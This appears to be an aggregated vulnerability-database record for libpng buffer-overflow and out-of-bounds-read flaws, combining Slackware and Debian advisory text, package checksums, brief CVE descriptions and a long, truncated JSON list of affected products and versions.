Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libpng-1.6.19-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: c6eb0eeb425af17d02655f2f9fa69723 libpng-1.2.54-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: ee85a731b10fe3d5767b97e91d6bfc1f libpng-1.2.54-x86_64-1_slack13.0.txz
Slackware 13.1 package: 3d6d26c2cdd0f8ffc9d4ee4284ebdfc7 libpng-1.4.17-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 2b9beff2066d8cd2530c4db6878f3644 libpng-1.4.17-x86_64-1_slack13.1.txz
Slackware 13.37 package: 36f5490f07d75665bab2bc5cccd77437 libpng-1.4.17-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: b0110d8941fd249c9b99932b7de67990 libpng-1.4.17-x86_64-1_slack13.37.txz
Slackware 14.0 package: 0e21fde66006e6e86117ba075e8c160d libpng-1.4.17-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 221b16014a862c02e787519a3090812b libpng-1.4.17-x86_64-1_slack14.0.txz
Slackware 14.1 package: cdd3f81e3a487b4aceb1920295c9ffbe libpng-1.4.17-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: e0f2e5230458bdb77a19dbc09b6eae0e libpng-1.4.17-x86_64-1_slack14.1.txz
Slackware -current package: 56306097bf7dde2aa757d122d6fb3616 l/libpng-1.6.19-i586-1.txz
Slackware x86_64 -current package: d11905e7d052578e96ff10f42b175c89 l/libpng-1.6.19-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg libpng-1.4.17-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address.
CVE-2015-8126
Joerg Bornemann discovered multiple buffer overflow issues in the
libpng library.
CVE-2016-1630
Mariusz Mlynski discovered a way to bypass the Same Origin Policy
in Blink/Webkit.
CVE-2016-1631
Mariusz Mlynski discovered a way to bypass the Same Origin Policy
in the Pepper Plugin API.
CVE-2016-1632
A bad cast was discovered.
CVE-2016-1633
cloudfuzzer discovered a use-after-free issue in Blink/Webkit.
CVE-2016-1634
cloudfuzzer discovered a use-after-free issue in Blink/Webkit.
CVE-2016-1635
Rob Wu discovered a use-after-free issue in Blink/Webkit.
CVE-2016-1636
A way to bypass SubResource Integrity validation was discovered.
CVE-2016-1637
Keve Nagy discovered an information leak in the skia library.
CVE-2016-1638
Rob Wu discovered a WebAPI bypass issue.
CVE-2016-1639
Khalil Zhani discovered a use-after-free issue in the WebRTC
implementation.
CVE-2016-1640
Luan Herrera discovered an issue with the Extensions user interface.
CVE-2016-1641
Atte Kettunen discovered a use-after-free issue in the handling of
favorite icons.
CVE-2016-1642
The chrome 49 development team found and fixed various issues
during internal auditing. Also multiple issues were fixed in
the v8 javascript library, version 4.9.385.26.
For the stable distribution (jessie), these problems have been fixed in version 49.0.2623.75-1~deb8u1.
For the testing distribution (stretch), these problems will be fixed soon.
For the unstable distribution (sid), these problems have been fixed in version 49.0.2623.75-1.
We recommend that you upgrade your chromium-browser packages. The Common Vulnerabilities and Exposures project identifies the following problems:
CVE-2015-7981
Qixue Xiao discovered an out-of-bounds read vulnerability in the
png_convert_to_rfc1123 function. A remote attacker can potentially
take advantage of this flaw to cause disclosure of information from
process memory
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "solaris",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "11.3"
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "42.1"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "15.10"
},
{
"_id": null,
"model": "jdk",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.6.0"
},
{
"_id": null,
"model": "libpng",
"scope": "gte",
"trust": 1.0,
"vendor": "libpng",
"version": "1.3.0"
},
{
"_id": null,
"model": "libpng",
"scope": "lt",
"trust": 1.0,
"vendor": "libpng",
"version": "1.0.64"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "7.0"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "13.2"
},
{
"_id": null,
"model": "satellite",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "5.6"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.4"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.4"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "15.04"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "21"
},
{
"_id": null,
"model": "jre",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.8.0"
},
{
"_id": null,
"model": "jre",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.7.0"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "13.1"
},
{
"_id": null,
"model": "libpng",
"scope": "lt",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.17"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "12.04"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.7"
},
{
"_id": null,
"model": "jdk",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.8.0"
},
{
"_id": null,
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.3"
},
{
"_id": null,
"model": "libpng",
"scope": "lt",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.24"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.3"
},
{
"_id": null,
"model": "jdk",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.7.0"
},
{
"_id": null,
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "libpng",
"scope": "lt",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.54"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "14.04"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.3"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "22"
},
{
"_id": null,
"model": "mac os x",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.11.4"
},
{
"_id": null,
"model": "libpng",
"scope": "lt",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.19"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "23"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6"
},
{
"_id": null,
"model": "libpng",
"scope": "gte",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7"
},
{
"_id": null,
"model": "satellite",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "5.7"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.7"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.2"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.5"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.2"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.7"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.7"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "linux enterprise desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.2"
},
{
"_id": null,
"model": "libpng",
"scope": "gte",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.0"
},
{
"_id": null,
"model": "jre",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.6.0"
},
{
"_id": null,
"model": "linux enterprise server",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "12"
},
{
"_id": null,
"model": "libpng",
"scope": "gte",
"trust": 1.0,
"vendor": "libpng",
"version": "1.1.1"
},
{
"_id": null,
"model": "linux enterprise desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "12"
},
{
"_id": null,
"model": "jre update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.865"
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.866"
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.865"
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.791"
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.6105"
},
{
"_id": null,
"model": "jre update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.791"
},
{
"_id": null,
"model": "jre update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.6105"
},
{
"_id": null,
"model": "jre update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.866"
},
{
"_id": null,
"model": "mac os x",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "10.11.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1689.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.924.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.6.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1049.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.77"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.31"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.71"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.51"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.166"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.28"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.891.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.15"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.27"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1005.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.42"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.67"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.702.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1311.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.687.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.78"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.879.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.74"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.92"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.926.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1077.1"
},
{
"_id": null,
"model": "websphere real time sr8",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3"
},
{
"_id": null,
"model": "forms viewer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.24"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.97"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "44.0.2403.157"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.58"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.47"
},
{
"_id": null,
"model": "tivoli monitoring fix pack",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.306"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.57"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.122"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.59"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.57"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.15"
},
{
"_id": null,
"model": "cplex optimization studio",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "12.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.51"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.73"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1036.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.31"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.62"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.56"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.28"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.87"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1308.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.633.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.105"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.769.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.785.0"
},
{
"_id": null,
"model": "cplex enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "12.6.3"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.49"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.60"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.27"
},
{
"_id": null,
"model": "tivoli monitoring",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.31"
},
{
"_id": null,
"model": "websphere real time",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.908.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.204"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.62"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.25"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.78"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.1"
},
{
"_id": null,
"model": "websphere real time sr2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.86"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.40"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.8"
},
{
"_id": null,
"model": "cplex enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "12.5.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.40"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.604.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.58"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.44"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.150"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.0"
},
{
"_id": null,
"model": "powerkvm build",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1.157"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.68"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.40"
},
{
"_id": null,
"model": "tivoli endpoint manager for remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.2.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.756.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.74"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.34"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.886.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.123"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.51"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.233"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.88"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.64"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.955.0"
},
{
"_id": null,
"model": "cplex optimization studio",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "12.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1082.0"
},
{
"_id": null,
"model": "tivoli common reporting",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1.1.2"
},
{
"_id": null,
"model": "cognos business intelligence server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.760.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.110"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1658.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.594.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.118"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.743.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1285.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.96365"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "43.0.2357.130"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.47"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.83"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.816.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.88"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.78"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.42"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.618.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.628.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.56"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.815.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.802.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.6"
},
{
"_id": null,
"model": "cognos business intelligence server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "26.0.1410.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.804.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.77"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.22"
},
{
